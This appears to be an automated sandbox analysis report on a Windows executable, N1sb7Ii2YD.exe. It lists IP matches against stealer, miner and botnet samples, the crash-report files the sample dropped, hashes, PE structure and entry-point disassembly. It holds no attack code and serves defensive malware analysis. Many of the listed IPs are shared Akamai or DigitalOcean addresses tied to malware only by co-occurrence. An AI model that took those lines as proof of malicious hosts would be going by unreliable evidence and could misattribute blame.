                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  AKAMAI-ASUSfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                  • 23.66.101.207
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 23.37.186.133
                                                                                                                                                                                                                                                  https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.60.85.188
                                                                                                                                                                                                                                                  bad.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 2.19.198.72
                                                                                                                                                                                                                                                  Yogi Tea Benefits Open Enrollment.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 2.19.126.151
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 2.19.198.26
                                                                                                                                                                                                                                                  DIGITALOCEAN-ASNUSfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                  • 138.68.79.95
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                                  PO DOC.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  • 164.90.188.192
                                                                                                                                                                                                                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 138.68.116.54
                                                                                                                                                                                                                                                  MDtEXRDJ3N.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                                                                                  OmUg4Vt9Cg.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                  • 68.183.112.81
                                                                                                                                                                                                                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                  • 174.138.36.14
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 178.62.201.34
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):0.9608847772154354
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:WV1vg0jsjh4Boy7Jf5QXIDcQFc6xQcEWcw3Zo+HbHg/wWGTf3hOyc45WAU6NCUtN:70j5S0LicrjsFRzuiF7Z24IO8r
                                                                                                                                                                                                                                                  MD5:806C8A93FC4D10D847D13CAEF3A8A32A
                                                                                                                                                                                                                                                  SHA1:B00C340AA14629F4306D1C34C771F26523474614
                                                                                                                                                                                                                                                  SHA-256:2324ED1066DC200F9A9E1A7A448E33AA96879B3E615FE5CD8CD4F28DEC89FB57
                                                                                                                                                                                                                                                  SHA-512:C4CDD30E2125587BD2D2F4DC1F42D09B797381D83C766AA0B4E7FD2BE57D266CD722E296F5EA8038EAF13FFD7FDC4B97C77F32C36D4989B01D9EEC4D49201784
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.3.2.5.1.0.7.2.4.9.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.9.3.2.5.1.6.0.3.7.4.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.2.2.8.a.4.2.-.d.9.7.2.-.4.c.e.f.-.b.4.8.e.-.8.c.3.1.3.d.5.d.c.b.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.5.7.8.2.9.c.-.2.f.8.2.-.4.6.5.6.-.8.d.0.d.-.c.7.d.d.b.3.5.b.e.2.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.1.s.b.7.I.i.2.Y.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.2.4.-.0.0.0.1.-.0.0.1.5.-.2.b.b.4.-.8.a.3.d.5.3.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.1.e.3.6.7.6.2.6.5.e.4.8.0.f.b.a.1.7.b.6.0.f.8.f.b.0.c.1.3.9.0.0.0.0.f.f.f.f.!.0.0.0.0.a.0.f.a.c.c.c.a.4.7.8.b.c.3.5.e.d.e.6.b.f.4.b.3.6.f.c.c.f.3.c.a.4.3.8.8.e.d.2.8.!.N.1.s.b.7.I.i.2.Y.D...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 07:14:11 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):53150
                                                                                                                                                                                                                                                  Entropy (8bit):2.78194025653929
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:cdHuHX2Ul3OrxiJ7Op1B/LWyRTaap/gmfnb6yelqHRQmLBxVKuhqQtqxU4/puiMt:+HKl3237BjWwp1nnFR9rr0U4/p4t
                                                                                                                                                                                                                                                  MD5:989BAA7DA22E9F8E28756701FE12CCBE
                                                                                                                                                                                                                                                  SHA1:27F381D46EAEEC5C7C9566EB87D549D8C2DA00EA
                                                                                                                                                                                                                                                  SHA-256:410C900377771A847656888ACF485F2CA35474DEFC5FFF6A771F3C8DD8AA795B
                                                                                                                                                                                                                                                  SHA-512:32E2A1B7600A4F3DFD541192DCC67D66D4D521015C2338BB756F79DEB04089C4B89220B61A848DA911E3C7E80EC034BFE9A96A682247EAA76894B93E8C386FC2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ........$ag............4...............H...........<............-..........`.......8...........T...........8A..f.......................................................................................................eJ......t ......GenuineIntel............T.......$....$ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8366
                                                                                                                                                                                                                                                  Entropy (8bit):3.702717173278831
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJpj36o46Y2DZSU9zqgmfZWUpDM89bROOysfX7m:R6lXJpT6f6YUSU9zqgmfEAROOxfi
                                                                                                                                                                                                                                                  MD5:271180643577FC7E562FFB9FB79F0D83
                                                                                                                                                                                                                                                  SHA1:60C891CC56C0D2EDDA5E01F0CD874691B116768C
                                                                                                                                                                                                                                                  SHA-256:6066D4E328EC22EB76EDA51D02902162C225BF1F9063DC6459AA339410F43734
                                                                                                                                                                                                                                                  SHA-512:DE3D4C5131E9A598F40463EB0043FC050D182E6E9B4CA787E6162407FFBD90BD789F3874E413DDE6BB992288A533FB5EAF482F420AC2B553677DD4AC8E15C35F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.2.4.<./.P.i.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4629
                                                                                                                                                                                                                                                  Entropy (8bit):4.518365661788778
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsbJg77aI9nMWpW8VYIYm8M4Jv9MFn+q8CVP7t5zlEd:uIjf1I7Nl7VkJEX7HzlEd
                                                                                                                                                                                                                                                  MD5:778789E5C6A438835008079152F85A8F
                                                                                                                                                                                                                                                  SHA1:9FAA823E802A9C29FDA10EADD0FCACC4922CF864
                                                                                                                                                                                                                                                  SHA-256:4E6D2B5AF027FB6ECEBCC28EE283C50AB6554D2B2FD5D1EF0936149190980275
                                                                                                                                                                                                                                                  SHA-512:C0583496B8B5D4C9BF00191C3110DF4EA4205AE9E5B1E9C0A5513E5D1C8C627744E688BAB79BF70CC838A7370F47DB1F32390257E31B0C34844B8721B7CAEF4A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634936" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.468577989643067
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:lzZfpi6ceLPx9skLmb0fqZWSP3aJG8nAgeiJRMMhA2zX4WABluuN8jDH5S:dZHtqZWOKnMM6bFpCj4
                                                                                                                                                                                                                                                  MD5:33633A36C174DA3FAC6CCF635A9B82DC
                                                                                                                                                                                                                                                  SHA1:DC757ABF5D6D89F35390D40C6895E923588B4EA6
                                                                                                                                                                                                                                                  SHA-256:5C5DBC03CC50AD7AB7A15F36E38C7347706CEBE419EAED2F63E6596D57AE351F
                                                                                                                                                                                                                                                  SHA-512:42031B0B86275578E409A6A8BE0D06FF1DC584D271306AE02197CE14ED9312488AC7D647CA341CBB901BDFF7448946B6BEF537102C1A40446F91A1D370A9E690
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.J.ESP..............................................................................................................................................................................................................................................................................................................................................gp.q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.110752434022267
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:N1sb7Ii2YD.exe
                                                                                                                                                                                                                                                  File size:432'640 bytes
                                                                                                                                                                                                                                                  MD5:b5bd4911ad7b091685625baf619caa97
                                                                                                                                                                                                                                                  SHA1:a0faccca478bc35ede6bf4b36fccf3ca4388ed28
                                                                                                                                                                                                                                                  SHA256:660ed48c61433adf4a2ccd04430982a3c3b8a8cb6159b4b6962f92978df215e6
                                                                                                                                                                                                                                                  SHA512:ec6b280e5978b97b605dd419ee7dde4b7d838ab8f2727bbac5a60c761dd40934b01a0d5db56d702148da17d62cb8a8d8a2893c5f117117b3706e23a45db8d69c
                                                                                                                                                                                                                                                  SSDEEP:6144:bWDODNMgA8ALXURZhBXCHjxvqt1RyV79TPQ/JWsFv:6DANMiATUrCHjxvqkVpTPQ/JX5
                                                                                                                                                                                                                                                  TLSH:0294F1223292C033E5B646759918C6B05E7BBC710F659ACB7BC44A7D6F306E28F36346
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nKK..%...%...%..]....%..]....%..]..1.%...^...%...$.0.%..]....%..]....%..]....%.Rich..%.................PE..L...C..d...........
                                                                                                                                                                                                                                                  Icon Hash:63796de961436e0f
                                                                                                                                                                                                                                                  Entrypoint:0x40871b
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x64C01A43 [Tue Jul 25 18:53:55 2023 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:c00735f05d13fd7a2bf1a7281832b72f
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  call 00007F722085FD77h
                                                                                                                                                                                                                                                  jmp 00007F7220857F8Eh
                                                                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 00000328h
                                                                                                                                                                                                                                                  mov eax, dword ptr [00461468h]
                                                                                                                                                                                                                                                  xor eax, ebp
                                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                  test byte ptr [00461144h], 00000001h
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  je 00007F722085811Ah
                                                                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                                                                  call 00007F722085F63Bh
                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                  call 00007F722085FE31h
                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                  je 00007F722085811Ah
                                                                                                                                                                                                                                                  push 00000016h
                                                                                                                                                                                                                                                  call 00007F722085FE33h
                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                  test byte ptr [00461144h], 00000002h
                                                                                                                                                                                                                                                  je 00007F72208581E0h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000220h], eax
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000224h], ecx
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000228h], edx
                                                                                                                                                                                                                                                  mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000230h], esi
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000234h], edi
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000208h], ss
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000214h], cs
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000238h], ds
                                                                                                                                                                                                                                                  mov word ptr [ebp-0000023Ch], es
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000240h], fs
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000244h], gs
                                                                                                                                                                                                                                                  pushfd
                                                                                                                                                                                                                                                  pop dword ptr [ebp-00000210h]
                                                                                                                                                                                                                                                  mov esi, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                  mov dword ptr [ebp-0000020Ch], eax
                                                                                                                                                                                                                                                  mov dword ptr [ebp-000002D0h], 00010001h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-00000218h], esi
                                                                                                                                                                                                                                                  mov eax, dword ptr [eax-04h]
                                                                                                                                                                                                                                                  push 00000050h
                                                                                                                                                                                                                                                  mov dword ptr [ebp+000000E4h], eax
                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                  • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5fc800x28.text
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x39d8.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x38000x40.text
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b8.text
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x5f68c0x5f80050c7e76dcd8816178bb3df107d75619bFalse0.6153008426047121data6.369040301680162IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x610000xb1c80x64009670df5a80a7b2e69b9154a6ec815821False0.0912890625data1.2433942322875406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x6d0000x39d80x3a00f3a069affc8a38b5491b095211f7e2a5False0.4469288793103448data3.956907091931723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_ICON0x6d1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5368663594470046
                                                                                                                                                                                                                                                  RT_ICON0x6d1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5368663594470046
                                                                                                                                                                                                                                                  RT_ICON0x6d8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.41109958506224065
                                                                                                                                                                                                                                                  RT_ICON0x6d8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.41109958506224065
                                                                                                                                                                                                                                                  RT_ICON0x6fe500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                                                                                                                                                                                                  RT_ICON0x6fe500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                                                                                                                                                                                                  RT_STRING0x705400x496dataTamilIndia0.4454855195911414
                                                                                                                                                                                                                                                  RT_STRING0x705400x496dataTamilSri Lanka0.4454855195911414
                                                                                                                                                                                                                                                  RT_ACCELERATOR0x702e80x50dataTamilIndia0.825
                                                                                                                                                                                                                                                  RT_ACCELERATOR0x702e80x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                                                  RT_GROUP_ICON0x702b80x30dataTamilIndia0.9375
                                                                                                                                                                                                                                                  RT_GROUP_ICON0x702b80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                                  RT_VERSION0x703380x208data0.5384615384615384
                                                                                                                                                                                                                                                  DLLImport
